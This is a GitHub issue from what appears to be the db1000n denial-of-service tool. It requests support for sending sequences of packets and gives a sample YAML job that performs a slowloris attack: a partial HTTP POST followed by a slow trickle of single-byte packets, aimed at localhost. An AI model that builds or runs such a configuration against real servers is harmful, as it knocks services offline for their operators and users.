### ISSUE TITLE
Make it possible to send sequence of packets via packetgen

### ISSUE THREAD

**Issue by Arriven** [Arriven/db1000n#498]
Right now we can only send packets created via single template. In order to implement attacks similar to slowloris we need to be able to send a custom sequence of packets. Example configuration for slowloris would be something like this:

```yaml
jobs:
  - type: packetgen
    args:
      connection:
        type: net
        args:
          protocol: "tcp"
          address: "localhost:1234"
          tls_config:
            insecure_skip_verify: true
      packets:
        - count: 1
          payload:
            type: raw
            data:
              payload: "POST / HTTP/1.1\nHost: localhost:1234\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 1000\n\n"
        - count: 1000
          payload:
            type: raw
            data:
              payload: "A"
```

Ideally we should make the change in a backward-compatible manner so that old config with a single packet would still work
